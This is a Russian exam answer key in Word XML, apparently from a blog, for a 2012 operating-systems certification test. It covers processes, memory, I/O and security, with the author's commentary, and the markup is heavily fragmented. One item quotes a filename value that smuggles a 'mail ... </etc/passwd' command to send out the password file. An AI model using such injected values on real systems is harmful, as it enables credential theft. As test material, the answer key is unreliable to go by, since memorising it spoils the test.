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Аттестационное тестирование в сфере профессиона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b/>
            <w:bCs/>
            <w:kern w:val="2"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://mva-tests.blogspot.com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(весь юмор в том, что чиновники из Минобра пытаются проверить через тесты спецдисциплину, в которой они "ни уха-ни рыла...", а потому берется какой-нибудь ублюдочный курс и из него выдергиваются вопросы и ответы, все хорошо, если читать именно этот курс, в остальном - вероятность попадания 20-30%; я пошустрил по И-нету, нашел, как мне кажется, прообраз -  курс "Операционные системы, среды и оболочки" какого-то южного (то ли ставропольского, то ли черкасского :-) педагогического унивеситета (!!!), и на основании их мудрствований подготовил ответы, добавив в "мутных" случаях комментарии из этого курса, Wiki и Googl-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Это - ответы на репетиционный тест, надеюсь, что основной не намного умнее. В вопросы добавлены названия разделов, приведены все ответы, правильные выделены размером. По моему убеждению, чтобы пройти тестирование, нормальному студенту достаточно накануне прочитать два-три  раза эту белиберду, память у вас еще прекрасная, что-то в ней останется и этого будет достаточно для 40-50%-ного результата. (В конце есть ряд вопросов по компьютерной безопасности, тема эта в курсе ОС не рассматривается, да и то, что там представлено, - борьба с вирусами в изложении для слабоумных, компьютерная безопасность - серьезная вещь, и не нам, сирым и убогим, в ней разбираться :-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пехов вам, М.А. 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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Приношу свои извинения возможным читателям, в нижеприведенных ответах обнаружены ошибки, которые постараюсь сейчас исправить.М.А. 30.08.12 - 19.00 (к сожалению, одну ошибку все-таки так и не смог найти :-( , простите ). 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Специальность: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">230101.65  – Вычислительные машины, комплексы, системы и сети   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">Дисциплина: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Операционные системы</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:t xml:space="preserve">Время выполнения теста: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> минут         Количество заданий: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>50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Назначение и функции операционных систем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ля сетевых операционных систем характерной является функция обеспечени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го доступа к оперативной памяти другого компьютер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заимодействия связанных между собой компьютеров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мена сигналами между выполняющимися на разных компьютерах программ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граммных каналов между разными компьютерами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Операционная сред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Одна операционная система может поддерживать нескольк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икропрограммных сред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ерационных систе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икропрограммных систе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перационных сре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Операционная система выполняет функции управления вычислительными процессами в вычислительной системе, распределяет ресурсы вычислительной системы между различными вычислительными процессами и  образует программную среду, в которой выполняются прикладные программы пользователя. Такая среда называется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операционной. Параллельное существование терминов “операционная система” и “операционная среда” вызвано тем, что операционная система может поддержать несколько операционных сре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Прерывания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Термин "маскирование" означает запрет отдельных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игналов прерыва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анд пользов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ов пользовател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анд процессо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роцессы и потоки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Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные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упервизор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монитора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аркер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мафорам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Монитор (по Ч. Хоару) – высокоуровневая конструкция для синхронизации: многовходовый модуль, содержащий описание общих данных и операций над ними в виде процедур. Обеспечивается взаимное исключение исполнения мониторных операций. Монитор может также содержать условные переменные, для которых определены операции wait и signal для организации дополнительных очередей процессов. Рассмотрено решение задачи "обедающие философы" с использованием монитора. Описана реализация монитора и условных переменных с помощью семафоров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ЗАДАНИЕ N 5 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:i/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>Файлы и файловые системы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Относительный путь к файлу состоит из списка каталогов, которые нужн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ройти от рабочего каталога, чтобы добраться до файл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крыть в корневом процессе, чтобы добраться до файл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обавить в переменную PATH операционной сред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йти от корневого каталога, чтобы добраться до файл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6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амять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Свопингом сегментов называется перемещение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локов файла между каталогами файловой систем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локов данных между процессом и ядром операционн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гментов данных между стеком и оперативной памятью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егментов между оперативной и внешней памятью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7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ользователи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Идентификатор пользователя представляет собой уникальное _______ значени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оставное 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имвольное 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ещественное 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целое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8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Режимы работы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Мультитерминальный режим работы предполагает совмещение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419"/>
                    <w:gridCol w:w="270"/>
                    <w:gridCol w:w="410"/>
                    <w:gridCol w:w="4363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вилегированного режима работы и режима пользовател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ногопроцессорного режима работы и режима ввода-вывод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иалогового режима работы и режима мультипрограммирова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налогового режима работы и режима микропрограммир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9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онцепция процесс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оследовательная трансляция двух исходных программ явля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дним последовательным процессо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вумя одинаковыми процесса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вумя разными процесс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дной последовательной задач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0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Идентификатор, дескриптор и контекст процесса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Идентификатор процесса является частью _____________ процесс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контекст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Тип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дескриптора !!!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пис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bCs/>
                    </w:rPr>
                    <w:t>ЗАДАНИЕ N 1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Иерархия процессов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 OS UNIX каждый новый процесс может быть образован (порожден) тольк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вумя из существующих процессов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сколькими родительскими процесса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четным количеством родительских процессов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дним из существующих процесс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2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Диспетчеризация процессов</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:i/>
                      <w:iCs/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 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312741811" r:id="rId3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Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в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лительности выполне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чередности вы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корости выполне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частоте выполн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Планирование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заданий используется в качестве</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:shd w:fill="FFFFFF" w:val="clear"/>
                    </w:rPr>
                    <w:t> долгосрочного планирования процессов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. Оно отвечает за порождение новых процессов в системе, определяя ее</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:shd w:fill="FFFFFF" w:val="clear"/>
                    </w:rPr>
                    <w:t> степень мультипрограммирования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, т. е. количество процессов, одновременно находящихся в ней. Если</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:shd w:fill="FFFFFF" w:val="clear"/>
                    </w:rPr>
                    <w:t> степень мультипрограммирования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системы поддерживается постоянной, т. е. среднее количество процессов в компьютере не меняется, то новые процессы могут появляться только после завершения ранее загруженных. Поэтому</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:shd w:fill="FFFFFF" w:val="clear"/>
                    </w:rPr>
                    <w:t> долгосрочное планирование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shd w:fill="FFFFFF" w:val="clear"/>
                    </w:rPr>
                    <w:t>осуществляется достаточно редко.</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:shd w:fill="FFFFFF" w:val="clear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13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онятия приоритета и очереди процессов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иоритет, меняющейся во время исполнения процесса, называется _______ приоритетом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ксированн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Циклически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атически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инамически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bCs/>
                    </w:rPr>
                    <w:t>ЗАДАНИЕ N 14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инхронизация процессов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и совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в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дапт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инхронизац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тимиз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Буфериз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bCs/>
                    </w:rPr>
                    <w:t>ЗАДАНИЕ N 15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редства обработки сигналов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 операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между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роцесс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ора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гмент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нала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6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онятие событийного программирования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?????</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:i/>
                      <w:iCs/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 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816639670" r:id="rId5"/>
                    </w:object>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:i/>
                      <w:iCs/>
                    </w:rPr>
                    <w:t>- выберите несколько вариантов ответа</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr/>
                    <w:t xml:space="preserve">) </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="27"/>
                      <w:szCs w:val="27"/>
                    </w:rPr>
                    <w:t>Область эффективного применения событийного программирования начинается там, где возникают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трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процесс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зможности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы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бходимость использования графа перехода между состояния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неудобство использования графа переходов между состояния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7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редства коммуникации процессов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Два параллельных процесса могут быть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Взаимоисключающи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независимы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Критически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мутационн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8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пособы реализации мультипрограммирования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Главной целью мультипрограммирования в системах пакетной обработки явля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еспечение удобства работы пользовател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минимизация простоев всех устройств компьютер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инимизация времени выполнения одной задач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еспечение реактивности систе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ЗАДАНИЕ N 19 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:i/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>Организация памяти. Адресное пространство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Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет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ходить в памяти наиболее долго занятые участк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ыделять участки  памяти произвольных размеров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свобождать память, занятую неактивными процесса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мещать процессы в памят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</w:rPr>
                    <w:t>ЗАДАНИЕ N 20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Методы управления памят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Использование виртуальной памяти в однопрограммном режиме  приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти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варийному завершению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Ускорению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замедлению выполне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запуск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ринципы организации виртуальной памяти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Виртуальная память позволяет  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казаться от предоставления прикладным процессам оперативной памя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загружать множество небольших программ, суммарный объем которых больше объема физической памят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загружать программы, размер которых превышает объем доступной физической памя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гружать программы, скомпилированные для другого процессо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2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егментная организация памяти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Сегментная организация памяти … отдельно скомпилированных процедур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стоит из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упрощает компоновку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возможна без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ложняет компоновк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мимо простоты управления увеличивающимися или сокращающимися структурами данных, сегментированная память обладает и другими преимуществам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 ним относятся: простота компоновки отдельно скомпилированных процедур (обращение к начальной точке процедуры осуществляется адресом вида (n,0), где n – номер сегме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3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траничная организация памяти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ри страничной организации памяти таблица страниц может размещаться в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в оперативной памя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 оперативной памяти и на диске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в процессоре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 специальной быстрой памяти процессора и в оперативной памят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4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Ускорение работы страничной памяти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Страничная организация предназначена дл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легчения совместного использования процедур, библиотек и массивов данных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ышения уровня защиты программ и данных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олучения большого адресного пространства без приобретения дополнительной физической памя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огического разделения программ и данны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5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ринципы замещения страниц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При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна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брать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске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ыбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="1594" w:hRule="atLeast"/>
                    </w:trPr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брать страницу, которая не изменялась, и сохранить удаляемую страницу на диске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брать страницу-кандидат на удаление из памяти и сохранить копию удаляемой страницы в таблице страниц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26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Алгоритмы замещения страниц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ая реализация алгоритма LRU (Least Recently Used)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оретически невозможн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зможна при использовании стековой организации таблицы страниц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зможна при условии построения таблицы страниц в виде бинарных деревьев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рактически невозмож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</w:rPr>
                    <w:t>LRU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хороший, но труднореализуемый алгоритм. Необходимо иметь связанный список всех страниц в памяти, в начале которого будут хранится недавно использованные страницы. Причем этот список должен обновляться при каждом обращении к памяти. Много времени нужно и на поиск страниц в таком списк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7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рерывания от внешних устройств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Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывод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нтроллер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спетчер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упервизор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о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упервизор ввода-вывода получает запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы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8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лассификация устройств ввода-вывод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Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывод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зиционируем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имвольны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дресуем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Блочны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ругой тип устройств ввода-вывода — символьные устройства. Они выдают или воспринимают поток символов, не относящийся ни к какой блочной структуре. Они не являются адресуемыми и не имеют никакой операции позиционирования. В качестве символьных устройств могут рассматриваться принтеры, сетевые интерфейсы, мыши (в качестве устройства-указателя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9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Основные принципы организации ввода-вывод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Любые операции по управлению вводом-выводом объявляю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ривилегированны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Универсальным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оритетным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Уникальны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0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Функции супервизора ввода-вывода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Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор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упервизору прерывани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испетчеру задач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даче пользовател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упервизору програм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Режимы управления вводом-выводом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В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессор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ционально врем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рационально память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нерационально врем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ционально памя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2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Закрепление устройств, общие устройства ввода-вывод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онятия «виртуального устройства» по отношению к понятию «спулинга»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соотносится как часть и целое???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является более широким!!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является более узки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Тождествен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3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Основные системные таблицы ввода-вывода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Каждый элемент таблицы оборудования условно называ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UCB!!!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USB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DCB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D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аждая ОС имеет свои таблицы ввода/вывода, их состав (количество и назначе</w:t>
                    <w:softHyphen/>
                    <w:t>ние каждой таблицы) может сильно отличаться. Первая таблица содержит информацию обо всех устройствах вво</w:t>
                    <w:softHyphen/>
                    <w:t>да/вывода, подключенных к вычислительной системе,- таб</w:t>
                    <w:softHyphen/>
                    <w:t>лица оборудования (equipment table), а каждый элемент этой таблицы на</w:t>
                    <w:softHyphen/>
                    <w:t>зывается UCB (unit control block, блок управления устройством ввода/вывода). Вторая таблица предназначена для реализации принципа виртуа</w:t>
                    <w:softHyphen/>
                    <w:t>лизации устройств ввода/вывода – независимости от устройства. Действительное устройство, которое сопоставляется виртуальному (логическому), выбирается супервизором с помощью таблицы описания виртуальных логических устройств (DRT, device reference table). Назначение этой второй таблицы – установление связи между виртуальными (логическими) устройствами и реальными устройст</w:t>
                    <w:softHyphen/>
                    <w:t>вами, описанными посредством первой таблицы оборудовани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4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инхронный и асинхронный ввод-вывод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Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод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асинхронны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оритетны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втоматически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нхронны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5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Организация внешней памяти на магнитных дисках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рограмма, расположенная в главной загрузочной записи, называется _____________ загрузчиком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стемн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несистемным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чальн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Локальны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На жестком диске по физическому адресу 0-0-1 располагается главная загрузочная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апись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(master boot record, MBR).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остав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MBR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ходя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несистемный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агрузчик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(non-system bootstrap - NSB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таблица описания разделов диска (таблица разделов, partition table, PT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6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Кэширование операций ввода-вывода при работе с накопителями на магнитных дисках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ростейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной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Кластериз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буферизаци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>Диспетчериз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оритез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37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ринципы построенияОС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перационная система реального времени должна обеспечивать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легирование полномочи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наследование приоритетов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кетную обработку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лонирование пользовател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Требования, предъявляемые к среде исполнения систем реального времени, следующие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ядро с приоритетом на обслуживание прерывания. Приоритет на прерывание означает, что готовый к запуску процесс, обладающий некоторым приоритетом, обязательно имеет преимущество в очереди по отношению к процессу с более низким приоритетом, быстро заменяет последний и поступает на выполнение. Ядро заканчивает любую сервисную работу, как только поступает задача с высшим приорите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диспетчер с приоритетом - дает возможность разработчику прикладной программы присвоить каждому загрузочному модулю приоритет, неподвластный системе. Присвоение приоритетов используется для определения очередности запуска программ, готовых к исполнению. Диспетчеризация, в основу которой положен принцип присвоения приоритета, и наличие ядра с приоритетом на прерывание позволяют . Если наступает событие с высшим приоритетом, система прекращает обработку задачи с низшим приоритетом и отвечает на вновь поступивший запрос. Мартин Тиммерман сформулировал следующие необходимые требования для ОСРВ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 должна быть многозадачной и допускающей вытеснение (preemptable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 должна обладать понятием приоритета для поток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 должна поддерживать предсказуемые механизмы синхронизац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 должна обеспечивать механизм наследования приоритетов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8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Ядро и ресурсы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К невыгружаемым относятся такие ресурсы, которые не могут быть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гружены в память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гружены из памяти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тобраны у процесс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обраны у процессо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ыгружаемый ресурс</w:t>
                  </w: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этот ресурс безболезненно можно забрать у процесса (например:</w:t>
                  </w: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амять)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выгружаемый ресурс -</w:t>
                  </w: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тот ресурс нельзя забрать у процесса без потери данных (например:</w:t>
                  </w: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интер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9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Интерфейсы операционных систем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Интерфейс прикладного программирования предназначен для использования прикладными программами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истемных ресурсов компьютер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гистров общего назначения процессор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терпретатора команд пользовател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дресного пространства процесс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актически все</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana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</w:rPr>
                      <w:t>операционные системы</w:t>
                    </w:r>
                  </w:hyperlink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имеют API, с помощью которого программисты могут создавать приложения для этой операционной системы. Главный API операционных систем — это множество</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana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</w:rPr>
                      <w:t>системных вызовов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0</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr/>
                    <w:t xml:space="preserve"> Классификация операционных систем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о режиму обработки задач различают операционные системы, обеспечивающие _________ режим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мультипрограммны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иртуальный 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днопрограммны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многопользовательский??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Анализ угроз и уязвимостей в операционных системах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sz w:val="27"/>
                      <w:szCs w:val="27"/>
                    </w:rPr>
                    <w:t>Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц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зова утилит операционной систем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спетчера прило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вредоносных програм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дбора паро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hd w:fill="EEEEEE" w:val="clear"/>
                    <w:spacing w:lineRule="atLeast" w:line="285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ботнет или зомби-сеть</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                      <w:color w:val="000000"/>
                      <w:sz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– это сеть компьютеров, зараженных вредоносной программой поведения Backdoor. Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или всей сетью целиком) без ведома пользовател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2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Основы криптографии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Недостаток систем шифрования с секретным ключом состоит в том, чт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правитель сообщения не может его расшифровать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отправитель и получатель должны иметь общий секретный ключ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ъем вычислений при дешифровании намного больше, чем при шифрован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ъем вычислений при шифровании намного больше, чем при дешифровании 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Эффективность систем с секретным ключом обусловлена вполне приемлемым объемом вычислений, необходимых для шифрования или дешифрования сообщения, но у них имеется серьезный недостаток: и отправитель, и получатель должны владеть общим секретным ключом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3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Механизмы защиты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Объектами защиты в компьютерных системах могут быть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стройства отображения информ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ме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трудник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програм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Объект защиты — информация, носитель информации или информационный процесс, в отношении которых необходимо обеспечивать защиту в соответствии с поставленной целью защиты информации</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="444444"/>
                      <w:sz w:val="23"/>
                      <w:szCs w:val="23"/>
                      <w:shd w:fill="FFFFFF" w:val="clear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4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Надежные вычислительные системы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Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на 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ьзовател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икладную программу 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ерационную систему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руководителей подразд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45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Методы аутентификации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Защита зашифрованных паролей в UNIX взламывается путем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шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле парол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влечения инсайдеров в качестве сообщ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сшифровки всех паролей после копирования файла парол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числения пароля путем свертки идентификатора пользов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ЗАДАНИЕ N 46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Инсайдерские ата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Лазейки в программах создаю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ля облегчения отладки программ или в противоправных целях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для противоправных целей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ля внедрения в программу постороннего код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ько для облегчения отладки програм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Лазейки (trapdoors). Лазейка представляет собой точку вхо</w:t>
                    <w:softHyphen/>
                    <w:t>да в программу, благодаря чему открывается непосредственный доступ к некоторым системным функциям. Лазейки обычно встав</w:t>
                    <w:softHyphen/>
                    <w:t xml:space="preserve">ляют во время проектирования системы. Системные программисты организуют их при отладке программы, но по завершении ее разработки их надо устранить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bCs/>
                    </w:rPr>
                    <w:t>ЗАДАНИЕ N 47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Внешние атаки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, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru &lt;/etc/passwd”. Какие действия выполнит система?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0"/>
                    <w:gridCol w:w="270"/>
                    <w:gridCol w:w="411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копирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru.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тправит файл aaa адресату goofinator@mail.ru.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копирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru.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Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru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</w:rPr>
                    <w:t>ЗАДАНИЕ N 48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Вредоносные программы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Наиболее популярное применение ботнетов (сети зараженных компьютеров) - эт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ганизация сетевых азартных игр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спространение пиратского контент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рассылка коммерческого спам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хищение денег с кредитных кар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ЗАДАНИЕ N 49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Троянские кони и вирус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ерезаписывающий вирус заражает исполняемую программу путем  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записи кода вируса в тело зараженной программы после каждого ее вызов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записи содержимого стека программы кодом вируса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записи служебных секторов дисков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записи вируса на место кода программы!!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6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50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редства защиты от вредоносных программ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sz w:val="27"/>
                      <w:szCs w:val="27"/>
                    </w:rPr>
                    <w:t>Обнаружить зашифрованный вирус можно  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87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4391"/>
                    <w:gridCol w:w="270"/>
                    <w:gridCol w:w="410"/>
                    <w:gridCol w:w="4391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trike/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:strike/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t>с помощью универсальной программы дешифровани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 характерному поведению зараженной программы при запуске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36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t>по сигнатурам кода процедур расшифровки вируса!!!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 изменению размера програм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Это вирусы-партизаны, которые попав в систему, сразу не дают себя обнаружить и не вступают в активную фазу. Они выжидают нужное им время, находясь в закодированном и безвредном состоянии, при этом зачастую они остаются незамеченными сканерами антивирусов. Как только наступает благоприятное для заражения файлов время, вирусы дешифруются, выполняют свою «грязную работу» и снова кодируются. Различные методы шифрования и упаковки вредоносных программ делают даже известные вирусы не обнаруживаемыми антивирусным программным обеспечением. Для обнаружения этих «замаскированных» вирусов требуется мощный механизм распаковки, который может дешифровать файлы перед их проверкой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Keyword">
    <w:name w:val="key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a-tests.blogspo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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/&#1057;&#1080;&#1089;&#1090;&#1077;&#1084;&#1085;&#1099;&#1081;_&#1074;&#1099;&#1079;&#1086;&#1074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1:00Z</dcterms:created>
  <dc:creator>*</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>*</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-10-03T15:42:00Z</dcterms:modified>
  <cp:revision>3</cp:revision>
  <dc:subject/>
  <dc:title>Аттестационное тестирование в сфере профессионального образования</dc:title>
</cp:coreProperties>
</file>